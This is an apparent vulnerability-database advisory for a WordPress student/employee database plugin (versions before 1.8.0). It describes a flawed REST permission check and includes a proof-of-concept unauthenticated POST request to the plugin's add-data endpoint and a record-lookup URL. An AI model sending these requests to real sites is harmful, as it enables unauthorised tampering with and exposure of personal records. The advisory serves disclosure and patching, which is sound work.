Lucene search

K
wpexploitWpvulndbWPEX-ID:AF2FEAD6-9F8E-4C00-AC50-440DE969CA42
HistoryAug 01, 2022 - 12:00 a.m.

Student Result or Employee Database < 1.8.0 - Unauthorised REST Calls

2022-08-0100:00:00
wpvulndb
68
unauthorised rest calls
database
post request
vulnerability
exploit
security issue

The plugin has a flawed permission callback in its REST endpoints, allowing unauthenticated attackers to call them and add/edit/delete arbitrary student for example

POST /wp-json/v2/ssr_add_data HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 104
Connection: close

rid=Test&roll=&stdname=&fathersname=&pyear=&cgpa=&subject=&dob=&gender=&address=&mnam=&c1=&c2=&image=


http://example.com/wp-json/v2/ssr_find_all?postID=<RID>